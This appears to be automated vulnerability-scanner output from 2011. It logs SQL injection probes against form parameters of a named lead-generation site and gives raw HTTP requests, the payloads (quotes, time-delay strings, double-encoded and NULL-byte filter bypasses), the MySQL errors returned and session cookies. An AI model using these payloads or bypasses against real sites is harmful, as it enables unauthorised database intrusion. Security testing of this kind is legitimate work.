<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The attributeId_487%5B%5D parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_487%5B%5D parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 04:27:58 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7118 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... ibles&attributeId_555_t=&attributeId_556_t=&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=3205__Dental insurance&attributeId_489_t=&attributeId_491_t=&attributeId_492_' at line 5
The attributeId_487%5B%5D parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_487%5B%5D parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure'&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:01:29 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=ihr4st2rbabducv3db1vhc8mt4; path=/ Content-Length: 7318 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5
The attributeId_487%5B%5D parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_487%5B%5D parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure'&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:13:35 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7094 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=3205__Dental insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_49' at line 5
Request 2
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure''&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:13:35 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 36090
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The attributeId_488%5B%5D parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_488%5B%5D parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance'&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:15:00 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7094 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Yes - higher deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&' at line 5
Request 2
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance''&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:15:01 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53453
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The attributeId_489_t parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_489_t parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3'&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:01:37 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=us8ldhbp16r2og1j658jhl1d07; path=/ Content-Length: 7318 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5
The attributeId_489_t parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_489_t parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3'&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:15:19 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7094 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Yes - higher deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&' at line 5
Request 2
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3''&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:15:20 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53453
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The attributeId_491_t parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the attributeId_491_t parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3%2527&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:01:42 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=inv5vvk0lr8gfil9sl875hu1c0; path=/ Content-Length: 7334 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5
The attributeId_491_t parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_491_t parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3'&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 